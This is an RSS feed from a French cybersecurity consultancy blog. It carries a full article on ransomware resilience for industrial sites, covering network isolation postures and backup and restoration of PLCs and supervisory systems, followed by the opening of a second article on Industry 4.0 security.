<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>SI industriel - RiskInsight</title>
	<atom:link href="https://www.riskinsight-wavestone.com/tag/si-industriel/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.riskinsight-wavestone.com/tag/si-industriel/</link>
	<description>Le blog cybersécurité des consultants Wavestone</description>
	<lastBuildDate>Tue, 14 Sep 2021 11:00:07 +0000</lastBuildDate>
	<language>fr-FR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/Blogs-2024_RI-39x39.png</url>
	<title>SI industriel - RiskInsight</title>
	<link>https://www.riskinsight-wavestone.com/tag/si-industriel/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Cyber résilience en milieu industriel</title>
		<link>https://www.riskinsight-wavestone.com/2021/03/cyber-resilience-en-milieu-industriel/</link>
		
		<dc:creator><![CDATA[Alexandrine Torrents]]></dc:creator>
		<pubDate>Mon, 15 Mar 2021 10:30:59 +0000</pubDate>
				<category><![CDATA[Eclairage]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<category><![CDATA[Industrie]]></category>
		<category><![CDATA[Manufacturing]]></category>
		<category><![CDATA[OT]]></category>
		<category><![CDATA[ransomware]]></category>
		<category><![CDATA[Reconstruction]]></category>
		<category><![CDATA[résilience]]></category>
		<category><![CDATA[SI industriel]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=15340</guid>

					<description><![CDATA[<p>Pour les lecteurs les plus impatients, vous pouvez accéder directement aux Eléments clés à la fin de l&#8217;article. Rappel de l’état de la menace L’ANSSI indique dans ÉTAT DE LA MENACE RANÇONGICIEL &#8211; À L&#8217;ENCONTRE DES ENTREPRISES ET INSTITUTIONS[1] publié...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2021/03/cyber-resilience-en-milieu-industriel/">Cyber résilience en milieu industriel</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="text-align: justify;">Pour les lecteurs les plus impatients, vous pouvez accéder directement aux <a href="#clés"> Eléments clés</a> à la fin de l&rsquo;article.</p>
<h3>Rappel de l’état de la menace</h3>
<p style="text-align: justify;">L’ANSSI indique dans <em>ÉTAT DE LA MENACE RANÇONGICIEL &#8211; À L&rsquo;ENCONTRE DES ENTREPRISES ET INSTITUTIONS</em><a href="#_ftn1" name="_ftnref1">[1]</a> publié le 05/02/2020 : «&nbsp;Depuis 2018, l’ANSSI et ses partenaires constatent que de plus en plus de groupes cybercriminels possédant des ressources financières et des compétences techniques importantes favorisent le ciblage d’entreprises et institutions particulières dans leurs attaques par rançongiciel.&nbsp;».</p>
<p style="text-align: justify;">Face à ce constat, il est plus que jamais nécessaire de sécuriser les systèmes d’information. Cela passe bien entendu par l’application des fondamentaux de la sécurité&nbsp;: application des mises à jour, gestion des comptes et des mots de passe, gestion de la segmentation réseau etc. Pour rappel, l’application de ces premières mesures permet déjà de réduire sensiblement la probabilité qu’un système d’information soit sujet à un rançongiciel, mais ne peut en aucun cas garantir que cela n’arrivera pas.</p>
<h3 style="text-align: justify;">Spécificité du secteur industriel</h3>
<p style="text-align: justify;">Cependant, même si de nouvelles solutions de défense sont continuellement développées, le coût et la complexité de déploiement de certaines d’entre elles les rendent finalement peu usitées. Cela est d’autant plus vrai en milieu industriel, où leur intégration peut s’avérer complexe, certains systèmes étant figés dans une configuration fonctionnelle. De plus, les budgets alloués à la sécurité informatique en milieu industriel, bien qu’en augmentation ces dernières années, ne sont pas encore suffisants pour bon nombre de sites.</p>
<p style="text-align: justify;">Par ailleurs, un système d’information industriel partage une base commune avec un système d’information classique, et est donc sujet aux mêmes attaques. Bien entendu, des attaques telles que Stuxnet, Triton, ou encore BlackEnergy (à plus faible échelle) nécessitent des compétences supplémentaires. Cependant, il est toujours bon de rappeler que les cibles d’intérêt pour les groupes possédant ce type de moyens sont généralement déjà soumises à des obligations règlementaires (LPM, directive NIS etc.), qui si respectées, limitent grandement les risques qu’une attaque soit réussie à leur encontre. Pourtant, ces systèmes ne sont pas invulnérables, et doivent donc également se préparer à y répondre.</p>
<h3 style="text-align: justify;">Attaque inévitable sur les systèmes industriels : comment minimiser l&rsquo;impact et redémarrer les opérations rapidement ?</h3>
<p style="text-align: justify;">Il apparait donc que&nbsp;:</p>
<ul style="text-align: justify;">
<li>Se protéger de la menace est souvent limité à l’application des mesures de sécurité basiques si aucune obligation règlementaire n’est applicable au système d’information cible&nbsp;;</li>
<li>Identifier les sources de menace et détecter une attaque avant qu’elle n’atteigne son objectif nécessite dans l’immense majorité des cas des moyens trop importants vis-à-vis des budgets des systèmes d’information industriels actuels.</li>
</ul>
<p style="text-align: justify;">En partant du principe que la probabilité qu’un système d’information subisse une cyberattaque réussie, et plus spécifiquement un rançongiciel, dans un avenir proche est quasi certaine, la question suivante se pose donc&nbsp;: «&nbsp;Comment se préparer à une cyberattaque majeure, maintenir les activités critiques dans un mode dégradé, le tout en regagnant rapidement confiance dans le système d’information industriel&nbsp;?&nbsp;».</p>
<p style="text-align: justify;">La réponse à cette question est couverte par les deux derniers piliers de la sécurité informatique d’après le <em>framework</em> NIST&nbsp;: <em>respond</em> (répondre) et <em>recover </em>(récupérer). Une tentative de réponse à cette question est présentée dans cet article.</p>
<p style="text-align: justify;">Note&nbsp;: la première partie de cet article «&nbsp;Comment répondre à une attaque avant qu’il ne soit trop tard&nbsp;?&nbsp;» n’est pas nécessaire à la mise en place des recommandations détaillées dans la seconde partie «&nbsp;Comment récupérer après une attaque si elle n’a pas pu être circonscrite&nbsp;?&nbsp;». Bien que l’implémentation de mesures de filtrage réseau soit vivement conseillée, il peut être intéressant pour les sites où la mise en place desdites mesures de filtrage est trop longue, de commencer par la partie préparation de la remédiation à une cyberattaque, plus facile à mettre en œuvre.</p>
<p>&nbsp;</p>
<h2 style="text-align: justify;">Comment répondre à une attaque avant qu’il ne soit trop tard&nbsp;?</h2>
<h3 style="text-align: justify;">Impliquer les équipes industrielles</h3>
<p style="text-align: justify;">Avant de parler des mesures pouvant être mises en place pour répondre à un incident de sécurité numérique, il peut être intéressant de rappeler que le personnel industriel est habitué la gestion de crise.</p>
<p style="text-align: justify;">En effet, bon nombre d’industries organisent régulièrement des exercices de gestions de crises (incendie, risque chimique, catastrophe naturelle etc.). Sur la majorité des sites sensibles, des procédures sont donc déjà disponibles pour répondre à ce type d’incident, le tout sous la direction d’un responsable dédié. Par ailleurs, des protections physiques autonomes sont généralement disponibles&nbsp;: soupape de surpression, clapet anti-retour, sprinkler etc. bien qu’ils soient parfois remplacés par des systèmes instrumentés de sécurité connectés.</p>
<p style="text-align: justify;">Le contexte est donc propice à l’ajout d’une nouvelle procédure afin de répondre à une attaque informatique. Celle-ci consistera généralement en l’isolation du système d’information industriel de l’extérieur via une procédure dite de «&nbsp;bouton rouge&nbsp;». Afin de rédiger la procédure associée, l’implication du personnel du site sera essentielle, notamment pour s’assurer que l’application de cette dernière ne soit pas plus nocive que l’attaque elle-même.</p>
<h3 style="text-align: justify;">Un prérequis à la mise en place de posture d&rsquo;isolement : la maitrise de ses flux et l&rsquo;implémentation de cloisonnement/filtrage réseau</h3>
<p style="text-align: justify;">En effet, il est nécessaire de mesurer les impacts engendrés par l’usage du «&nbsp;bouton rouge&nbsp;». Pour cela, il faut tout d’aborder lister les interconnexions du site industriel avec d’autres systèmes.</p>
<p style="text-align: justify;"><strong>Lister les interconnexions avec d’autres systèmes d’informations</strong></p>
<p style="text-align: justify;">Il peut être intéressant de commencer par lister les flux entre le système d’information industriel et l’extérieur. En premier lieu, il convient de définir ce que contient ce système. Dans un cas basique, il regroupe les automates industriels, la supervision, ainsi que le matériel nécessaire à l’interconnexion des deux premiers.</p>
<p style="text-align: justify;">D’autres équipements peuvent ensuite venir s’y greffer&nbsp;: un serveur d’historisation, des postes clients pour la supervision, un NAS etc. Ce réseau, nommé réseau industriel par la suite, est généralement connecté avec d’autres réseaux&nbsp;afin de partager des informations avec des équipements de ces derniers.</p>
<p style="text-align: justify;">Il est notamment possible de citer&nbsp;:</p>
<ul style="text-align: justify;">
<li>Des échanges avec l’ERP de l’entreprise (qu’un MES&nbsp;– <em>Manufacturing Execution System</em> soit présent ou non), généralement localisé sur le réseau bureautique&nbsp;;</li>
<li>Des échanges avec des partenaires&nbsp;: régulation des réseaux électriques, d’eau, de gaz etc.</li>
<li>Des échanges avec des fournisseurs de service&nbsp;: météo, solutions <em>cloud</em> d’optimisation énergétique, de maintenances prédictives etc.</li>
</ul>
<p style="text-align: justify;">Ces flux, bien qu’utiles pour simplifier l’exploitation, peuvent généralement être temporairement coupés ou remplacés par des moyens de substitution (appel téléphonique pour indiquer les niveaux de production par exemple).</p>
<p style="text-align: justify;">Par ailleurs, chaque site industriel est différent, et gère donc différemment ces interconnexions. Il est notamment courant de voir des réseaux MPLS dédiés aux sites industriels lorsque l’entreprise en possède plusieurs. Dans d’autres cas, le réseau bureautique sera utilisé pour les fédérer. Il en va de même pour les besoins de connexion entre ces réseaux industriels et Internet, qui passent parfois d’abord par le réseau bureautique, ou bénéficient d’une sortie directe.</p>
<p style="text-align: justify;"><strong>Lister ses flux internes</strong></p>
<p style="text-align: justify;">Après avoir listé les interconnexions entre le réseau industriel et l’extérieur, il reste à lister les flux internes. La majorité de ces flux devraient être strictement nécessaires au bon fonctionnement du processus industriel, tels que ceux entre la supervision et les automates. La coupure de ces connexions nécessiterait donc de stopper le processus industriel, ou au minimum de le mettre en sûreté.</p>
<p style="text-align: justify;">Il peut alors être intéressant de séparer les équipements et flux associés en plusieurs zones&nbsp;:</p>
<ul style="text-align: justify;">
<li>Supervision&nbsp;;</li>
<li>Réseau de terrain&nbsp;;</li>
<li>Autres (postes clients de la supervision, serveur d’historisations, etc.).</li>
</ul>
<p style="text-align: justify;">La mise en place de ces zones permet de réduire drastiquement l’exposition de ces composants. En effet, seule la supervision devrait avoir accès aux réseaux de terrain, tandis que la catégorie «&nbsp;autres&nbsp;» ne devrait pouvoir accéder qu’à la supervision.</p>
<p style="text-align: justify;">D’autres zones peuvent être nécessaires à implémenter telles que&nbsp;:</p>
<ul style="text-align: justify;">
<li>Une zone d’administration&nbsp;: qui pourrait également être utilisée pour programmer les automates en fonction de la répartition des rôles et des responsabilités sur le site&nbsp;;</li>
<li>Une DMZ&nbsp;: pouvant accueillir un serveur relais afin que les équipements extérieurs au site industriel ne se connectent pas directement à la supervision pour venir récupérer les données de production etc.</li>
</ul>
<p style="text-align: justify;">En fonction des services proposés (serveur WSUS, serveur antivirus, Terminal Server pour la prise en main à distance etc.) d’autres zones peuvent bien évidemment encore être ajoutées.</p>
<p style="text-align: justify;"><strong>Evaluer le réel besoin de ses flux</strong></p>
<p style="text-align: justify;">Après avoir listé l’ensemble de ces flux, il est intéressant d’identifier le besoin réel de chacun d’entre eux. Par exemple, est-ce vraiment nécessaire de pouvoir accéder à ses courriers électroniques depuis un serveur de supervision&nbsp;?</p>
<p style="text-align: justify;">Afin de limiter l’exposition du réseau industriel à l’extérieur, il pourrait également être nécessaire de sortir certains équipements de ce dernier. Par exemple, si une base de données accédée depuis le réseau bureautique est alimentée par la supervision, mais non utile à celle-ci, l’héberger directement sur le réseau bureautique peut s’avérer plus simple que de tenter d’en limiter les accès.</p>
<p style="text-align: justify;">Une fois les flux nécessaires clairement identifiés, il convient de configurer les règles de filtrage associées de manière fine (adresse IP source, adresse IP destination, port de destination). Ce travail nécessite généralement un investissement humain important, principalement des équipes en charge du site industriel, ainsi qu’un coût matériel non négligeable pour se doter d’équipements de sécurité. C’est cependant un prérequis à la mise en place des postures de repli décrites par la suite. Dans un cas idéal, un filtrage applicatif (niveau 7 du modèle OSI) pourrait également être implémenté.</p>
<p style="text-align: justify;">Ce travail, bien qu’essentiel à la mise en place de postures d’isolement, est également l&rsquo;une des actions fondamentales à réaliser dans le cadre de la sécurisation d’un système d’information (industriel ou non). En effet, chaque flux coupé est un flux qu’il n’est pas nécessaire de surveiller, ainsi qu’un flux de moins exploitable par un attaquant.</p>
<h3 style="text-align: justify;">Préparer ses postures de repli</h3>
<p style="text-align: justify;">L’isolation complète de l’ensemble des équipements d’un système d’information industriel n’est pas toujours souhaitable, même en cas d’attaque. Après avoir listé ces flux, il peut alors être intéressant de ne pas mettre en place une seule posture d’isolement, mais plusieurs postures de repli, permettant dans certains cas de pouvoir continuer à travailler presque normalement.</p>
<p style="text-align: justify;"><strong>Posture de repli préventif : isoler l&rsquo;usine en cas d&rsquo;attaque sur un réseau tiers</strong></p>
<p style="text-align: justify;">Après avoir identifié les flux entre le réseau industriel et l’extérieur, il est possible de créer une posture de repli associée afin de les désactiver en cas de besoin. L’objectif de cette posture est de couper toutes les interconnexions du réseau industriel avec l’extérieur afin d’empêcher toute propagation d’une attaque. Une solution éprouvée est de regrouper ces flux sur quelques ports Ethernet dédiés. Ainsi, il suffit d’indiquer dans les procédures associées de débrancher les câbles associés pour activer la posture de repli. Cela évite également d’intervenir sur la configuration des pare-feux en cas d’incident de cybersécurité.</p>
<p style="text-align: justify;">Par ailleurs, il est également nécessaire de définir les cas où cette posture devrait être activée. Si elle peut l’être sans poser de problème particulier à la production, ni ajouter trop travail au personnel du site, la question peut se poser de la réelle nécessité de ces flux.</p>
<p style="text-align: justify;">Si cette posture a bel et bien des impacts sur les activités industrielles du site, il faut donc trouver un bon équilibre entre la déclencher trop tôt (dès que l’antivirus d’un poste de travail bureautique remonte une alerte), ou trop tard (après le chiffrement des premiers postes industriels). Cela dépendra également du contexte de l’entreprise et de ses moyens (équipe de veille sécurité dédiée ou non etc.).</p>
<p style="text-align: justify;"><strong>Spécificité (sites distribués, non autonomes etc.)</strong></p>
<p style="text-align: justify;">Dans le cas où l’ensemble des flux avec l’extérieur n’ont pas la même destination, il peut être également intéressant de décliner plusieurs postures de repli spécifiques. En effet, si le prestataire en charge de la gestion des caméras du site alerte sur le fait qu’il subit une attaque par rançongiciel, il semble plus optimal de ne déconnecter que les flux entre ce prestaire et le réseau de l’usine, plutôt que l’ensemble des flux, incluant notamment ceux vers l’ERP.</p>
<p style="text-align: justify;">Dans le cas où le processus industriel est distribué sur plusieurs sites (usine de production et de distribution notamment), l’activation de la posture de repli préventif ne devrait pas couper les flux entre ces différents sites. En effet, des liaisons spécifiques devraient y être dédiées. Si cela n’est pas le cas, utilisation du réseau bureautique pour assurer ces connexions par exemple, un projet de refonte du réseau industriel est probablement à prévoir (déploiement d’une VRF dédiée, ou d’un réseau SDWAN par exemple).</p>
<p style="text-align: justify;">Enfin, il est toujours bon de rappeler que chaque usine étant différente, une étude locale sera à mener sur chacune pour en comprendre les spécificités.</p>
<p style="text-align: justify;"><strong>Posture de repli de dernier recours : couper le système d&rsquo;information en cas d&rsquo;attaque avérée sur l&rsquo;usine</strong></p>
<p style="text-align: justify;">Enfin, il peut être intéressant de préparer une posture de repli de dernier recours. Cette dernière devrait consister en l’isolation de chaque VLAN (si définis, de préférence avec une interface locale homme-machine par VLAN pour assurer un mode dégradé) ou de chaque équipement (extinction des commutateurs &#8211; <em>switch</em>) afin d’empêcher l’attaquant de continuer ses actions, qui, dans les cas d’attaques les plus avancées, pourraient cibler directement le processus industriel du site.</p>
<p style="text-align: justify;">L’objectif est alors de mettre le site en sûreté ou d’en assurer les services essentiels. L’activation de cette posture implique de travailler sans système d’information, et ne devrait être appliquée qu’en cas de compromission avérée d’au moins un équipement du site puisqu’elle aboutit au même résultat immédiat qu’un rançongiciel, si ce n’est pire.</p>
<p style="text-align: justify;">Un travail en amont avec les exploitants sera nécessaire afin de lister l’ensemble des actions à réaliser lors de l’activation de cette posture et définir des modes dégradés. En effet, cela va généralement nécessiter d’activer des astreintes afin de réaliser manuellement certaines tâches&nbsp;: vérification du bon fonctionnement des équipements, notamment sur les sites distants, utilisation des interfaces hommes-machines locales, etc. Par ailleurs, certains processus industriels ne sont plus pilotables manuellement aujourd’hui, et devront donc être compléments stoppés puisqu’aucun mode dégradé n’est disponible.</p>
<p style="text-align: justify;">Afin d’estimer les impacts de l’activation d’une telle posture, il peut être intéressant de s’intéresser aux impacts listés en cas d’incendie ou de panne générale d’électricité. Par ailleurs, seul un test réel de cette posture permet de s’assurer de ses impacts opérationnels.</p>
<p>&nbsp;</p>
<h2 style="text-align: justify;">Comment récupérer après une attaque si elle n’a pu être circonscrite&nbsp;?</h2>
<p style="text-align: justify;">Dans certains cas, l’activation des postures de repli peut ne pas suffire à protéger l’ensemble du système d’information industriel, notamment si elles sont activées trop tard. Il est alors essentiel de pouvoir procéder à la reconstruction de tout ou partie dudit système dans un temps suffisamment court pour limiter les impacts associés.</p>
<p style="text-align: justify;">Les principaux prérequis nécessaires à la restauration d’un système d’information industriel sont listés ci-après.</p>
<h3 style="text-align: justify;">Que faut-il sauvegarder pour pouvoir restaurer ses automates ?</h3>
<p style="text-align: justify;">Afin de pouvoir redémarrer l’usine, il est nécessaire dans la plupart des cas de commencer à restaurer les automates, ce qui nécessite deux éléments principaux.</p>
<p style="text-align: justify;"><strong>Posséder une copie à jour de ses programmes automates</strong></p>
<p style="text-align: justify;">Les automates sont épargnés dans la plupart des attaques actuelles, probablement puisque cibler les postes Windows suffit aux attaquants pour atteindre leurs objectifs visés. Cependant, les attaques sont amenées à être de plus en plus ciblées, et la majorité des automates actuellement en service ne sont pas sécurisables (communications non chiffrées et non authentifiées, mots de passe par défaut, fonctionnalité d’administration non désactivables etc.).</p>
<p style="text-align: justify;">Il convient donc de sauvegarder ces programmes, ce qui est déjà généralement le cas, notamment sur le poste de programmation (appartenant parfois à un prestataire) utilisé lors de la mise en service de l’appareil. Il est à noter que ces sauvegardes devraient être stockées sur au moins un support hors-ligne, de façon à ne pas les voir chiffrer au même moment que le poste les hébergeant.</p>
<p style="text-align: justify;">Ces constats restent valables même pour les nouvelles gammes d’automates, qui, bien que bénéficiant d’un niveau de sécurité sans commune mesures avec leurs prédécesseurs, ne sont pour autant pas invulnérables.</p>
<p style="text-align: justify;"><strong>Sauvegarder un moyen de télécharger ces programmes sur les automates</strong></p>
<p style="text-align: justify;">La majorité des automates nécessite un logiciel dédié pour être programmé. Et ce, même pour simplement télécharger un programme déjà écrit. Il convient donc de posséder une copie de ces programmes.</p>
<p style="text-align: justify;">Dans certains cas, un poste de programmation déconnecté du réseau et réservé à cet usage peut être une solution. Il est cependant à noter que le maintien en condition de sécurité d’un tel poste peut rapidement s’avérer complexe. Si cette solution est sélectionnée, ce poste pourrait également héberger la copie des programmes automates. Garder un second jeu de sauvegarde hors-ligne (disque dur externe par exemple) serait cependant une sécurité supplémentaire.</p>
<p style="text-align: justify;">Par ailleurs, si de nouvelles gammes d’automates sont utilisées, avec les dernières fonctionnalités de sécurité activées, d’autres éléments sont à sauvegarder tels que : les mots de passe des programmes automates, les certificats utilisés pour certaines communications (ou un moyen d’en regénérer) etc.</p>
<p style="text-align: justify;">Ces prérequis sont également valables pour les équipements réseaux (pare-feux, commutateurs etc.).</p>
<h3 style="text-align: justify;">Que faut-il sauvegarder pour pouvoir restaurer son matériel informatique essentiel ?</h3>
<p style="text-align: justify;"><strong>Identifier ce qui est vraiment nécessaire</strong></p>
<p style="text-align: justify;">La restauration des superviseurs, et des postes clients associés, revient généralement à restaurer un système Windows et les programmes associés. Plusieurs questions sont alors à se poser pour identifier les éléments à sauvegarder&nbsp;:</p>
<ul style="text-align: justify;">
<li>Quels sont les équipements nécessaires ? Un poste d’ingénierie, un superviseur, quelques postes opérateurs ?</li>
<li>Est-il possible de réinstaller le superviseur de zéro (nouvelles installations de Windows et du logiciel de supervision) puis d’y déposer une sauvegarde de la configuration du superviseur&nbsp;? Est-ce réalisable en un temps suffisamment court&nbsp;?</li>
<li>Une copie complète du disque du superviseur ne serait-elle pas plus simple&nbsp;? Il suffirait en effet d’insérer le disque sauvegardé pour redémarrer.</li>
<li>Des modifications sont-elles régulièrement apportées au logiciel de supervision&nbsp;? Si oui, est-il nécessaire de toutes les sauvegarder&nbsp;? Dans ce cas, il parait complexe de réaliser une copie complète du disque à chaque fois.</li>
</ul>
<p style="text-align: justify;"><strong>Sauvegarder intelligemment</strong></p>
<p style="text-align: justify;">Dans la majorité des cas, les sauvegardes des postes Windows sont réalisées de la même manière que celles des programmes automates, c’est-à-dire en réalisant des copier/coller. Il pourrait alors être intéressant de s’intéresser aux mécanismes de sauvegarde automatique. Cependant, ces derniers sont probablement à proscrire pour les usines partant de zéro et ne bénéficiant pas d’un budget suffisant pour les installer sereinement. En effet, la mise en œuvre de ce type de solution de manière sécurisée reste généralement plus complexe que de réaliser une simple copie bit à bit d’un disque dur.</p>
<h3 style="text-align: justify;">Ne pas négliger la documentation et l’entrainement</h3>
<p style="text-align: justify;">Avoir à disposition des sauvegardes complètes n’est cependant pas suffisant. Il est également nécessaire de rédiger les modes opératoires détaillés permettant de restaurer ces sauvegardes. En effet, si une crise venait à survenir, le stress des équipes, et l’indisponibilité potentielle de certains des sachants, pourraient mener à des erreurs de manipulations en l’absence de documentation.</p>
<p style="text-align: justify;">Ces procédures n’ont pas vocation à permettre une restauration complète de l’ensemble des systèmes, mais au moins de permettre de redémarrer les éléments essentiels précédemment identifiés&nbsp;:</p>
<ul style="text-align: justify;">
<li>Un poste d’ingénierie avec les logiciels de programmation automates associés&nbsp;;</li>
<li>Un superviseur&nbsp;;</li>
<li>Deux à trois postes de travail des opérateurs&nbsp;;</li>
<li>Les automates essentiels de l’usine.</li>
</ul>
<p style="text-align: justify;">Par ailleurs, il est généralement recommandé de bénéficier d’au moins deux jeux de sauvegardes, l’un stocké à proximité des équipements concernées, l’autre à stocker sur un site physiquement éloigné, et dont l’accès est limité à un nombre restreint de personnes. Il peut être tentant de stocker un jeu de sauvegarde supplémentaire en ligne, mais il est à noter qu’en cas de cyberattaque, et d’activation des postures de repli, il soit complexe de télécharger ces sauvegardes et de les déposer sur les systèmes à restaurer.</p>
<p style="text-align: justify;">Enfin, il est essentiel de tester l’ensemble de ces procédures pour s’assurer qu’elles sont exhaustives. Un test pourrait par exemple être l’occasion de se rendre compte que la sauvegarde de la configuration du superviseur n’inclut pas la clé de licence, ou encore que les mots de passes configurés lors de la copie complète du disque aient été modifiés depuis sans en garder l’historique.</p>
<p>&nbsp;</p>
<h2 style="text-align: justify;">Conclusion</h2>
<p style="text-align: justify;">La gestion des crises est une composante importante du métier de beaucoup d’exploitants de systèmes industriels. Ces mêmes personnes sont également les plus en maitrise sur leur périmètre. Pour autant, il ne s’agit généralement pas d’experts en informatique. Des mesures pragmatiques, et adaptées à leur contexte, seront donc bien plus utiles qu’un guide générique de 200 pages regroupant l’ensemble des bonnes pratiques à appliquer sur un système d’information.</p>
<p style="text-align: justify;">Tout comme en développement avec le principe KISS (<em>Keep it simple,stupid),</em> <strong>les postures de repli, ainsi que les procédures de restauration, devraient rester simples à comprendre, et stupides à appliquer.</strong></p>
<p style="text-align: justify;">Par ailleurs, bien que l’application d’une politique de filtrage réseau stricte ne peut qu’être conseillée, elle n’est pas strictement nécessaire à la mise en place des actions de sauvegarde et restauration. Ainsi, même si la probabilité qu’une attaque aboutisse n’en sera que plus forte, il sera toujours possible de restaurer les systèmes critiques.</p>
<p style="text-align: justify;">Enfin, il est à noter que de plus en plus de processus industriels fonctionnent aujourd’hui en flux tendu. Dans ce type de contexte, la préservation du système industriel d’une attaque, ou la capacité de le restaurer rapidement, ne serait pas suffisant à maintenir le niveau de production si la gestion des commandes ou de la distribution par exemple sont indisponibles. La cyber résilience doit donc être prise en compte à l’échelle de l’entreprise, et non uniquement au niveau du site industriel.</p>
<h2 id="clés" style="text-align: justify;">Eléments clés</h2>
<p style="text-align: justify;">Pour répondre à une attaque avant qu’il ne soit tard il est nécessaire&nbsp;:</p>
<ul style="text-align: justify;">
<li>D’impliquer les équipes industrielles&nbsp;(sans quoi il est fort probable que l’informatique survive à l’attaque, mais sans que l’usine ne continue de répondre à sa mission première) ;</li>
<li>De maitriser ses flux et implémenter un cloisonnement/filtrage réseau afin de pouvoir mettre en place des postures de repli&nbsp;:
<ul>
<li>Préventives, afin d’isoler l&rsquo;usine en cas d&rsquo;attaque sur un réseau tiers&nbsp;sans pour autant impacter de manière trop significative le processus industriel&nbsp;;</li>
<li>De dernier recours, afin de couper le système d&rsquo;information en cas d&rsquo;attaque avérée sur l&rsquo;usine avant que l’attaquant ne modifie le processus industriel.</li>
</ul>
</li>
<li>De tester ces postures de repli, afin de s’assurer que leur activation ne soit pas pire que l’attaque.</li>
</ul>
<p style="text-align: justify;">Et dans le cas où l’attaque n’a pu être circonscrite, les éléments suivants sont généralement nécessaires afin de pouvoir récupérer de ladite attaque&nbsp;:</p>
<ul style="text-align: justify;">
<li>Posséder une copie à jour de ses programmes automates&nbsp;;</li>
<li>Sauvegarder un moyen de télécharger ces programmes sur les automates ;</li>
<li>Posséder au moins une copie de l’ensemble des sauvegardes critiques sur un support hors-ligne (disque dur externe par exemple)&nbsp;;</li>
<li>Identifier son matériel informatique essentiel (notamment afin de ne pas restaurer le serveur d’historisation avant celui de supervision…)&nbsp;;</li>
<li>Sauvegarder intelligemment, parfois une copie bit à bit du disque dur est plus efficace qu’une copie automatique sur un serveur dédié, généralement chiffré en même temps que le système dont il héberge les sauvegardes&nbsp;;</li>
<li>Ne pas négliger la documentation et l’entrainement (dans le cas contraire, une clé de licence oubliée, ou un sachant en vacances pourrait rapidement signer la fin de la restauration…).</li>
</ul>
<p style="text-align: justify;"><a href="#_ftnref1" name="_ftn1">[1]</a> <a href="http://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf">www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf</a></p>
<p style="text-align: justify;">Une nouvelle version de l’état de la menace a été publiée en ce début d’année&nbsp;: <a href="https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-001.pdf">https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-001.pdf</a></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2021/03/cyber-resilience-en-milieu-industriel/">Cyber résilience en milieu industriel</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>La cybersécurité industrielle à l’ère de l’Industrie 4.0 : comment sécuriser ces nouveaux cas d’usage et accompagner les projets métiers ?</title>
		<link>https://www.riskinsight-wavestone.com/2021/02/la-cybersecurite-industrielle-a-lere-de-lindustrie-4-0-comment-securiser-ces-nouveaux-cas-dusage-et-accompagner-les-projets-metiers/</link>
		
		<dc:creator><![CDATA[Loïc Lebain]]></dc:creator>
		<pubDate>Mon, 22 Feb 2021 09:32:25 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<category><![CDATA[détection]]></category>
		<category><![CDATA[Industrie 4.0]]></category>
		<category><![CDATA[production]]></category>
		<category><![CDATA[SI industriel]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=15185</guid>

					<description><![CDATA[<p>L’industrie 4.0, une étape dans l’histoire de la course à la technologie Faisons un détour par une page d’histoire, avant de nous plonger dans le cœur de notre sujet : Au XVIIIe siècle, la machine à vapeur de James Watt et...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2021/02/la-cybersecurite-industrielle-a-lere-de-lindustrie-4-0-comment-securiser-ces-nouveaux-cas-dusage-et-accompagner-les-projets-metiers/">La cybersécurité industrielle à l’ère de l’Industrie 4.0 : comment sécuriser ces nouveaux cas d’usage et accompagner les projets métiers ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2 style="text-align: justify;">L’industrie 4.0, une étape dans l’histoire de la course à la technologie</h2>
<p style="text-align: justify;">Faisons un détour par une page d’histoire, avant de nous plonger dans le cœur de notre sujet :</p>
<ul style="text-align: justify;">
<li>Au XVIII<sup>e</sup> siècle, <strong>la machine à vapeur</strong> de James Watt et l’exploitation du charbon changent la manière de travailler. L’utilisation de <strong>machines hydrauliques</strong> fait évoluer les ateliers artisanaux en des usines bien plus performantes : la 1<sup>re</sup> révolution industrielle bat son plein.</li>
<li>Ensuite, la 2<sup>e</sup> révolution industrielle connue pour le <strong>taylorisme et la production en série</strong> repose sur l’utilisation de <strong>l’électricité et du pétrole</strong>. Les longues chaînes d’assemblage, chères à Charlie Chaplin, viennent remplacer les machines hydrauliques et à vapeur désormais désuètes.</li>
<li>Le développement des <strong>nouvelles technologies de l’information, dès 1970,</strong> épaulant les opérateurs dans les tâches les plus difficiles caractérise la 3<sup>e</sup> révolution industrielle. Elle permet notamment une <strong>robotisation </strong>accrue <strong>et production de plus grandes séries</strong>.</li>
</ul>
<p>&nbsp;</p>
